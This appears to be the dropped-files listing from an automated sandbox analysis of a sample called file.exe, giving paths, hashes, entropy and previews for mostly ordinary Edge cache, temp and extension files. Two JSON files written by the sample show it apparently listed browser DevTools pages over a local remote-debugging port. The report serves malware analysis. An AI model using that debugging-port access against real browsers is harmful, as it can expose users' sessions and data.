C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\5a2a7058cf8d1e56c20e6b19a7c48eb2386d141b.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2278
Entropy (8bit):	3.849346231347512
Encrypted:	false
SSDEEP:	48:uiTrlKxrgxaxl9Il8uysJS4Z63AeSP1IOonszd1rc:mjYQsJS4ZQArP1IrsU
MD5:	090C3BE4258CFDFC5869D60C103F12E7
SHA1:	F43F55142C1EB640F03D8B2DEB2FD808BF5DE01B
SHA-256:	385C8BA95CDD839DC39EA707A80EADF13D11F948E99ABB18D80D29E43D297EED
SHA-512:	3B2ABD7CD7920F2C2A0162596E17E160A5178C77DD1DE5549D8227E502AF9E0B49403891D9DE4F3A1758CFD7C7C8E733E6C7C93B1824DDC38BA13BC6ACF528B3
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".W.i.p.w.W.M.+.N.H.l.b.C.D.m.s.Z.p.8.S.O.s.j.h.t.F.B.s.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".g.B.e.u.H.V.p.C.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.I.Q.g.R.q.4.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\cf7513a936f7effbb38627e56f8d1fce10eb12cc.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	4622
Entropy (8bit):	4.000047507985608
Encrypted:	false
SSDEEP:	96:vYQsB1XTCYuSwSdsOqzrbEaK9x/KDbsWVCFwzL2mu:v+1XT1dqYx/KMWbLu
MD5:	1E9070677A9752A0B136745283DDF941
SHA1:	175F3D577E4CEE1E1AC77CC04E5F3E015BAB55B0
SHA-256:	42E2F707060DFB695BE3F85699A22FBDD40A060B0528D6A666A0C6A3623D2C97
SHA-512:	2241240BD4F02EA6E16AC69F7391C964F65D12AD28B75AF09E39C682A3255B605BB6F4EDF47A4BFA666BBDBDF3C9387125F726284F61101342A4E0106B4F10D8
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".z.3.U.T.q.T.b.3.7./.u.z.h.i.f.l.b.4.0.f.z.h.D.r.E.s.w.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".Q.v.0.c.A.1.J.C.2.w.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.w.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.I.Q.g.R.q.4.

C:\Users\user\AppData\Local\Microsoft\TokenBroker\Cache\e8ddd4cbd9c0504aace6ef7a13fa20d04fd52408.tbres

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	2684
Entropy (8bit):	3.91119844694901
Encrypted:	false
SSDEEP:	48:uiTrlKx68Wa7xfxl9Il8uysmOO426Ty+tCAJPN5Yu++IK1T0d/vc:aBYQsp2O3TPN5H++Z1J
MD5:	6F914E6B909320F29ABFC0715B2FA7A8
SHA1:	167664357387131A4E47B155920C57CC45C3B45C
SHA-256:	5C709D1C03E648AD61A744E3FE4B8C302EAF394EDA607429733C0DA1C7009160
SHA-512:	C2F0BA3AE2308D4703CCB9AD2D90F12F961D06B61D4CD84F542BF0C2D448A3037B917BD7A2821557B8A759B7825ACA20A374D0075E8A6A9BDF5DBAFC0328A0FE
Malicious:	false
Preview:	{.".T.B.D.a.t.a.S.t.o.r.e.O.b.j.e.c.t.".:.{.".H.e.a.d.e.r.".:.{.".O.b.j.e.c.t.T.y.p.e.".:.".T.o.k.e.n.R.e.s.p.o.n.s.e.".,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.a.j.o.r.".:.2.,.".S.c.h.e.m.a.V.e.r.s.i.o.n.M.i.n.o.r.".:.1.}.,.".O.b.j.e.c.t.D.a.t.a.".:.{.".S.y.s.t.e.m.D.e.f.i.n.e.d.P.r.o.p.e.r.t.i.e.s.".:.{.".R.e.q.u.e.s.t.I.n.d.e.x.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".6.N.3.U.y.9.n.A.U.E.q.s.5.u.9.6.E./.o.g.0.E./.V.J.A.g.=.".}.,.".E.x.p.i.r.a.t.i.o.n.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".X.w.+.Z.M.y.N.h.3.A.E.=.".}.,.".S.t.a.t.u.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.f.a.l.s.e.,.".V.a.l.u.e.".:.".A.A.A.A.A.A.=.=.".}.,.".R.e.s.p.o.n.s.e.B.y.t.e.s.".:.{.".T.y.p.e.".:.".I.n.l.i.n.e.B.y.t.e.s.".,.".I.s.P.r.o.t.e.c.t.e.d.".:.t.r.u.e.,.".V.a.l.u.e.".:.".A.Q.A.A.A.N.C.M.n.d.8.B.F.d.E.R.j.H.o.A.w.E./.C.l.+.s.B.A.A.A.A.I.Q.g.R.q.4.

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1267
Entropy (8bit):	5.366951624262528
Encrypted:	false
SSDEEP:	24:OBfNaoCAKINePKllDCaBfNaoCZnVDBYpDCZtBfNaoCra1UCb:SfNaoClTECufNaoCZV4CZrfNaoCJCb
MD5:	B4E1DCBE710AC4EA5CD3375166DF681D
SHA1:	9D63E9A9CC71BAF3E5176CE7E88660D61906F7C8
SHA-256:	EC6F4DC8A20803E82915F1CBA526CC210BBA9B912CF52624FDE3288A9846D368
SHA-512:	F852F84845DE1FC2F56E0AA064CB346944DD2A4A5C40D02A6BD5EDE26D2992F5B723C98BC46986556989C08505B9F85F9062A2CF8ECD3D444BB0FB46F386AD59
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/25E86DA0157CD84E817888683B7E48EC",.. "id": "25E86DA0157CD84E817888683B7E48EC",.. "title": "Google Network Speech",.. "type": "background_page",.. "url": "chrome-extension://neajdppkdcdipfabeoofebfddakdcjhd/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/25E86DA0157CD84E817888683B7E48EC"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/23E7ABD9A152875492F5F042A85F385F",.. "id": "23E7ABD9A152875492F5F042A85F385F",.. "title": "Google Hangouts",.. "type": "background_page",.. "url": "chrome-extension://nkeimhogjdpnpccoofpliimaahmaaome/background.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/23E7ABD9A152875492F5F042A85F385F"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtoo

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\Q4M8ZOMH\json[1].json

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3500
Entropy (8bit):	5.395346067223625
Encrypted:	false
SSDEEP:	96:6NnCmHCONnCobCwNnCw9CBNnCrC0dgECrQNnCUCbNnCZfiDCZZNnCcwCWNnCTLsK:6NtN1NYNkC02QN4NMfioZNdgN6
MD5:	82E4E432B7278955529D654C13C21B00
SHA1:	4B588F78D21E92E808FFFD7AF50C91A97DC35471
SHA-256:	D22946C66DD07A39159C3C3B4632A9AB7352138CEFD5C2AE764DFB9DE1F43E1F
SHA-512:	D68098C45948DB418B53B0D3DBF199DD2A3122CF8F861CE789E8842D2B52FA3AB7BB2EB23E14FF8D575FC65DD5B515FD4F4B6B6998424F4B99115B5D994EEC8C
Malicious:	false
Preview:	[ {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/66C2F6B1840112D3A266B63C2C615F9A",.. "id": "66C2F6B1840112D3A266B63C2C615F9A",.. "title": "Microsoft Voices",.. "type": "background_page",.. "url": "chrome-extension://jdiccldimpdaibmpdkjnbmckianbfold/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/66C2F6B1840112D3A266B63C2C615F9A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws=localhost:9223/devtools/page/7B6489F8BF836D3C0F3ECF947E87257A",.. "id": "7B6489F8BF836D3C0F3ECF947E87257A",.. "title": "WebRTC Internals Extension",.. "type": "background_page",.. "url": "chrome-extension://ncbjelpjchkpbikbpkcchkhkblodoama/_generated_background_page.html",.. "webSocketDebuggerUrl": "ws://localhost:9223/devtools/page/7B6489F8BF836D3C0F3ECF947E87257A"..}, {.. "description": "",.. "devtoolsFrontendUrl": "/devtools/inspector.html?ws

C:\Users\user\AppData\Local\Temp\01f8af06-f458-46e3-9a47-0e59a7188ecc.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1366x720, components 3
Category:	dropped
Size (bytes):	206855
Entropy (8bit):	7.983996634657522
Encrypted:	false
SSDEEP:	3072:5WcDW3D2an0GMJGqJCj+1ZxdmdopHjHTFYPQyairiVoo4XSWrPoiXvJddppWmEI5:l81Lel7E6lEMVo/S01fDpWmEgD
MD5:	788DF0376CE061534448AA17288FEA95
SHA1:	C3B9285574587B3D1950EE4A8D64145E93842AEB
SHA-256:	B7FB1D3C27E04785757E013EC1AC4B1551D862ACD86F6888217AB82E642882A5
SHA-512:	3AA9C1AA00060753422650BBFE58EEEA308DA018605A6C5287788C3E2909BE876367F83B541E1D05FE33F284741250706339010571D2E2D153A5C5A107D35001
Malicious:	false
Preview:	......Exif..II.................Ducky.......2......Adobe.d...........................................................#"""#''''''''''..................................................!! !!''''''''''........V.."....................................................................................!1..AQ..aq."2....R..T....Br.#S.U..b..3Cs...t6.c.$D.5uV...4d.E&....%F......................!1..AQaq....."2......BRbr3CS....#..4.............?......1f.n..T......TP....E...........P.....@.........E..@......E.P........@........E.....P.P..A@@.E..@.P.P..AP.P..AP..@....T..AP.E..P.Z .. ....."... .....7.H...w.....t.....T....M.."... P..n.n..t5..B.P..(......................................( .................... .".... .".......(.. ."....... ....o......E.6... ....."........."J......Ah......@.@@....:@{6..wCp..3...((.(.........................@..(...."............................ ........T.......@.@@........AP.P..@.E@....E@.d.E@.@@..@.P.T..@..@..P.D...@M........EO..."...=.wCp.....R......P.@......

C:\Users\user\AppData\Local\Temp\2fbdac59-51ed-441a-a225-6085d89135a6.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 50 x 50, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	1555671
Entropy (8bit):	7.992965324435075
Encrypted:	true
SSDEEP:	24576:oBp5jl7QY3go5JVFy9+jRpdcbNoTMwevfIw86p/X3dr407HUtHSs9IIA0AWFpLLe:q56YXfVFyORPINoTMwQfQK/ndrv7oSg+
MD5:	DAB31B1AB658B1B999F5EE12274CB0EA
SHA1:	9C9A57EB00A570976D54B8CC042027627A2DAEFE
SHA-256:	44C6A771341CE1FBCE2845584EC106A451804B291119405BF4F63EE54817F029
SHA-512:	1B68FC75E3C86659D860CDE47E2B59BCC9FEF876768444583974A13476DF64B8055DFB2D581415EA3C47725A04C4F38B192D5D5DAE6647BC4FD21A8C419E5644
Malicious:	false
Preview:	.PNG........IHDR...2...2......?.....?iCCPICC Profile..H..W.XS...[.....@@J.M......B..6B. ...A...v...].Q..bG.,../.T.u.`W............9.3...{....<.$... _\(...d.JMc.......8.K..@......../..D.^q.k.....-.......q......~...DZ..Q.[L..1.@G...x..g)q..g(.n.Mb<..V..<.4...%.3..YP.....X ....../?....t.m...b.>+.....if.j.xY.X9.EQ...H.xS..t..'..a.+5[../.3......rL..G.....6..D..=.(%[....G.....3...........!..H...)..B.W.:YT.M.X........F.x./.!S.a...<....}Yn.[..:[.U.c......).[....!.C.T......Y.........[B./......LiH..,.``...l.7Z...f'.)..y...\.KB1;i@GX0r`..aP.r..3.8)A..AR.....S$y.{.\....!v+(JP....T....De.xq./<V....D....L .5.L.9@......=!... ............k.(..B$.......BP........2..E....... ...{.b.x.[2x...?..`..x.`...{~...!..bd.......`b.1..B...q?......X]p..50....'...C.5B'..xQ...(.@'..Q."..\..P....}.:T..pC...A?l..zv.,G..<+...6......LF.C..d.G.....\...e..........C............`'.s.a..0.cX........X.....+..:....x..L.8.:w;.Q...'...3A2E*...d...A...N......./...8.w..k.......c.....s......

C:\Users\user\AppData\Local\Temp\54f8fed2-1675-4035-99d0-39950b7ee3a1.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\68e3ca33-e25a-4637-ae91-76899ca7a8d4.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:L:L
MD5:	5058F1AF8388633F609CADB75A75DC9D
SHA1:	3A52CE780950D4D969792A2559CD519D7EE8C727
SHA-256:	CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
SHA-512:	0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
Malicious:	false
Preview:	.

C:\Users\user\AppData\Local\Temp\8e31ef3a-f75e-4879-aa80-f14171da99ee.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 135363
Category:	dropped
Size (bytes):	76326
Entropy (8bit):	7.9961120748813075
Encrypted:	true
SSDEEP:	1536:hS5Vvm808scZeEzFrSpzBUl4MZIGM/iysAGz8vBBrYunau6wp:GdS8scZNzFrMa4M+lKqeu/nr
MD5:	01E352D35675990A139199DD86B38AAC
SHA1:	E16163C81E5F36B3B819AA0A63BFA63D88548A91
SHA-256:	148CDE42D38C62C1A1E8B8D3D4BD8830F0F8C2DC684E3C59B0A510E31011CA4A
SHA-512:	75A58FFAD6E3E0546268CC863AE382B5429795D8BCED64BAE2D06BCEEB6C2E37BD656A3E335EB61B521888B76913F2D0281F8C9C081FF8637307AE5934D98C8B
Malicious:	false
Preview:	...........m{..(.}...7.\...N.D.w..m..q....%XfL.I.ql..;/.....s...E...0....`..A..[o^.^Y...F_.'..."L...^.......Y..W..l...E0..YY...:.&.u?....J..U<.q."...p.ib:.g..^.q.mr.....^&.{.E.....,EAp.q.......=.=.....z^.,d.^..J.R..zI4..2b?.-D5/.^...+.G..Y..?5..k........i.,.T#........_DV....P..d2......b\..L....o....Z.}../....CU.$.-..D9`..~......=....._.2O..?....b.{...7IY.L..q....K....T..5m.d.s.4.^... ..~<..7~6OS..b...^>.......s..n....k."..G.....L...z.U...... ... .ZY...,...kU1..N...(..V.r\$..s...X.It...x.mr..W....g........9DQR....*d......;L.S.....G... .._D.{.=.zI.g.Y~...`T..p.yO..4......8$..v.J..I.%..._.d.[..du5._._...?\..8.c.....U...fy.t....q.t....T@.......:zu..\,.!.I..AN_.....FeX..h.c.i.W.......(.....Y..F...R%.\..@.. 2(e,&.76..F+...l.t.$..`...........Wi.{.U.&(.b}...}.i..,...k....!..%...&.c..D-."..SQ.......q9....)j....7.".N....AX...).d./giR....uk.....s.....^...........:...~......(hP..K.@.&..?.E0:+D\|9...U.q.cu..)t{.e...X...{.....z......LL&I6.=.

C:\Users\user\AppData\Local\Temp\b3fac72f-daf8-441c-abbc-955d76611a8c.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	11185
Entropy (8bit):	7.951995436832936
Encrypted:	false
SSDEEP:	192:YEKh1jNlwQbamjq6Bcykrs3kAVg55GzVQM5F+XwsxNv7/lsoltBq0WG4ZeJTmrRb:fKT/BAzA05Gn5F+XV7NNltrWG4kJTm1b
MD5:	78E47DDA17341BED7BE45DCCFD89AC87
SHA1:	1AFDE30E46997452D11E4A2ADBBF35CCE7A1404F
SHA-256:	67D161098BE68CD24FEBC0C7B48F515F199DDA72F20AE3BBB97FCF2542BB0550
SHA-512:	9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0....H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

C:\Users\user\AppData\Local\Temp\c189a463-e759-4f64-b5b7-27377aebb49f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	Google Chrome extension, version 3
Category:	dropped
Size (bytes):	138356
Entropy (8bit):	7.809609231921042
Encrypted:	false
SSDEEP:	3072:AQ++ZdS5+fnwcxO+XwquyeNnmraugZ/1DOoncWD/5q:AQ++/PZmlyeNnh/1SmRq
MD5:	3F6F93C3DCCD4A91C4EB25C7F6FEB1C1
SHA1:	9B73F46ADFA1F4464929B408407E73D4535C6827
SHA-256:	19F05352CB4C6E231C1C000B6C8B7E9EDCC1E8082CAF46FFF16B239D32AA7C9E
SHA-512:	D488FA67E3A29D0147E9EAF2EABC74D9A255F8470CF79A4AEA60E3B3B5E48A3FCBC4FC3E9CE58DFF8D7D0CAA8AE749295F221E1FE1BA5D20DEB2D97544A12BA4
Malicious:	false
Preview:	Cr24..............0.."0....H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.qBa/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.\|.X.M..u..s[...?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........q.a.....E..i.t,..7C..7!...`l.-.......T.vH...~.....'..aH..C.oJOE..d..2..$J......I..;.(9l.(..+.N.6.@...].a.n.S.6..=.b.W.\....o...#.~J.W.1..E...2H....S.g0....../.H...y.O8...kE.,..m!..F.D.p......H..s.W ...#.L........Ij.........-..n..\..vD.d.V.....!......[0Y0....H.=.....H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...F0D. ?Eq.M...[6^...+.].G..Y]...7..o.. U...v....P.J...@.E!...B.d..p..i".%............oo.<....~=..!t.+...`....h..LK....0....h...,.R%.....u...._..V_.q:_._..5}.uS\.....x?...~]..C-....S=L...._c.P.B....-M...62.i*.Q.....9.....+S=...../6:...W..ql/g..&j.y..{.."....\|..F....\|....V....w.%t.y..?..&..a..<.n....S+\|..=.ra.....

C:\Users\user\AppData\Local\Temp\cv_debug.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1420
Entropy (8bit):	5.38437110585716
Encrypted:	false
SSDEEP:	24:YJxF5sQ5szAW01Rp5yK10YO5qv70VhQu5Fa0rI5jleP0gpw5M:YJxF5sQ5sEW01X5y60YO5qD0VH5Fa0rL
MD5:	E1A4B0751291662B728FBCD186513D06
SHA1:	324C4CDAA11F054808F95F81A4391C3F55724078
SHA-256:	2EF53D4EA466856ED80C95FA58C46353AE88E02214DC74EA845B9BFCFBFD9CA6
SHA-512:	9B4267E360199C3317D3E405B1EFE29F864D46350E34FD84BC367A73C3655CFEFE5C66AF4BC8CAB11347D6872294F3E8CC1C6961A6429F6DF86D0A666186D413
Malicious:	false
Preview:	{"logTime": "1005/081724", "correlationVector":"2/PmMr7SOFFRIqTwW+HesJ","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"mBsci4p0IuAlecFQAh3IDU","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/081729", "correlationVector":"EFCCE5F7ECC74238A0D17C500D8EB81C","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083130", "correlationVector":"jkXXrPbML/1ucIa5c7okZ6","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083130", "correlationVector":"CECEB17551BE48CCBF3DD12E07118D84","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083241", "correlationVector":"WUtA7xoJfeUJPFSRRtPAng","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083242", "correlationVector":"B7F67C44DD3147F7BE748158D3F8E7B5","action":"FETCH_UX_CONFIG", "result":""}.{"logTime": "1005/083444", "correlationVector":"6kKZpL8SvSsrBcj/Fl+tva","action":"EXTENSION_UPDATER", "result":""}.{"logTime": "1005/083445", "correlationVector":"94D95442

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\128.png

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	4982
Entropy (8bit):	7.929761711048726
Encrypted:	false
SSDEEP:	96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
MD5:	913064ADAAA4C4FA2A9D011B66B33183
SHA1:	99EA751AC2597A080706C690612AEEEE43161FC1
SHA-256:	AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
SHA-512:	162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
Malicious:	false
Preview:	.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...T.P.B...*Tx...=.Q..wv.w.....\|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......\|..}./.....e..,.K.1........W.u.v. ...\.o

C:\Users\user\AppData\Local\Temp\scoped_dir5436_1122299922\CRX_INSTALL\_locales\af\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	908
Entropy (8bit):	4.512512697156616
Encrypted:	false
SSDEEP:	12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
MD5:	12403EBCCE3AE8287A9E823C0256D205
SHA1:	C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
SHA-256:	B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
SHA-512:	153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
Malicious:	false
Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 